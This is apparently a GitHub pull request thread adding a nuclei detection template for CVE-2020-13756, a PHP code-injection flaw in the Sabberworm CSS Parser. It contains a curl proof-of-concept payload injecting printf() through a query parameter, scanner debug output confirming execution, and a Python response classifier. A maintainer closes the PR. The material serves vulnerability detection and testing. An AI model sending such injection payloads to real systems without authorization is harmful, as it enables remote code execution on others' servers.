
Conversation

Contributor

@KrE80r KrE80r commented Dec 6, 2025

/claim #14249

PR Information

Note

Public vulnerable environment available: https://github.com/KrE80r/CVE-2020-13756-env

One-liner to spin up: docker run -d -p 8080:80 $(docker build -q https://github.com/KrE80r/CVE-2020-13756-env.git)

Template validation

  • Validated with a host running a vulnerable version and/or configuration (True Positive)
  • Validated with a host running a patched version and/or configuration (avoid False Positive)

Additional Details

Vulnerable Environment: https://github.com/KrE80r/CVE-2020-13756-env

# Quick setup
docker run -d -p 8080:80 $(docker build -q https://github.com/KrE80r/CVE-2020-13756-env.git)

# Verify RCE
curl "http://localhost:8080/?n=100;printf(%22TEST%22);"
# Should output "TEST" at start of response

Debug

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.5.1

                projectdiscovery.io

[INF] Current nuclei version: v3.5.1 (outdated)
[INF] Current nuclei-templates version: v10.3.4 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 0
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2020-13756] Dumped HTTP request for http://localhost:8080/?n=100;printf(%2236Sw5wftjkmzirlc8KNRfAw4VqR%22);

GET /?n=100;printf(%2236Sw5wftjkmzirlc8KNRfAw4VqR%22); HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.6 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

[DBG] [CVE-2020-13756] Dumped HTTP response http://localhost:8080/?n=100;printf(%2236Sw5wftjkmzirlc8KNRfAw4VqR%22);

HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=UTF-8
Date: Sat, 06 Dec 2025 09:25:00 GMT
Server: Apache/2.4.56 (Debian)
Vary: Accept-Encoding
X-Powered-By: PHP/8.0.30

36Sw5wftjkmzirlc8KNRfAw4VqR<pre>Array
(
    [0] => Sabberworm\CSS\Property\Selector Object
        (
            [sSelector:Sabberworm\CSS\Property\Selector:private] => #test .help
            [iSpecificity:Sabberworm\CSS\Property\Selector:private] => 110
        )

)
</pre>
[CVE-2020-13756] [http] [critical] http://localhost:8080/?n=100;printf(%2236Sw5wftjkmzirlc8KNRfAw4VqR%22);
[INF] Scan completed in 5.679046ms. 1 match found.

False Positive Test (Patched Version 8.3.1)

[INF] Scan completed in 5.14455ms. No results found.

Additional References:

The template now requires both the random marker AND the Sabberworm CSS namespace in the response body, ensuring it only triggers on actual vulnerable Sabberworm PHP CSS Parser instances, not generic honeypots.
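As an added example (not the template's or the project's own code), the two-condition rule the comment above describes, applied to raw HTTP response dumps like the one in the debug output; the three sample responses are constructed, the first copying the body shown above.

```python
import random
import string

# Namespace the template requires in the body, in addition to the marker.
NAMESPACE = "Sabberworm\\CSS"


def make_marker(length: int = 27) -> str:
    """Random alphanumeric token, like the 27-char one nuclei injected in the debug run."""
    alphabet = string.ascii_letters + string.digits
    return "".join(random.choice(alphabet) for _ in range(length))


def split_response(raw: str) -> tuple[int, str]:
    """Split a raw HTTP/1.1 response dump into (status code, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    status_line = head.split("\r\n", 1)[0]  # e.g. "HTTP/1.1 200 OK"
    return int(status_line.split()[1]), body


def classify(raw: str, marker: str) -> str:
    """Apply the PR's rule to one response.
    "true-positive": marker printed AND Sabberworm namespace dumped (vulnerable host)
    "marker-only":   marker present but no namespace (e.g. a honeypot reflecting the URL)
    "no-match":      anything else (patched host, unrelated service, non-200)
    """
    status, body = split_response(raw)
    if status != 200:
        return "no-match"
    has_marker, has_ns = marker in body, NAMESPACE in body
    if has_marker and has_ns:
        return "true-positive"
    return "marker-only" if has_marker else "no-match"


# --- constructed sample responses -----------------------------------------
MARKER = "36Sw5wftjkmzirlc8KNRfAw4VqR"  # marker from the debug output above
HEADERS = "HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n"
# Body as the vulnerable environment returned it in the debug run.
VULNERABLE = HEADERS + MARKER + (
    "<pre>Array\n(\n    [0] => Sabberworm\\CSS\\Property\\Selector Object\n        (\n"
    "            [sSelector:Sabberworm\\CSS\\Property\\Selector:private] => #test .help\n"
    "            [iSpecificity:Sabberworm\\CSS\\Property\\Selector:private] => 110\n        )\n\n)\n</pre>"
)
# Constructed: a honeypot echoing the request line has the marker but no namespace.
HONEYPOT = HEADERS + f'<html>GET /?n=100;printf("{MARKER}");</html>'
# Constructed: a patched (8.3.1) host does not evaluate the injected PHP.
PATCHED = HEADERS + "<pre>Array\n(\n    [0] => Sabberworm\\CSS\\Property\\Selector Object\n)\n</pre>"

if __name__ == "__main__":
    for name, resp in [("vulnerable", VULNERABLE), ("honeypot", HONEYPOT), ("patched", PATCHED)]:
        print(name, "->", classify(resp, MARKER))
```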
@theamanrawat
Contributor

Thank you so much for sharing this template with the community and contributing to this project 🍻

This cannot be detected in a normal template. We need a fuzzing template for this CVE, and the fuzzing template is not a part of the bounty claim program. For this reason, we are closing this PR and the issue.

We're looking forward to your continued contributions!
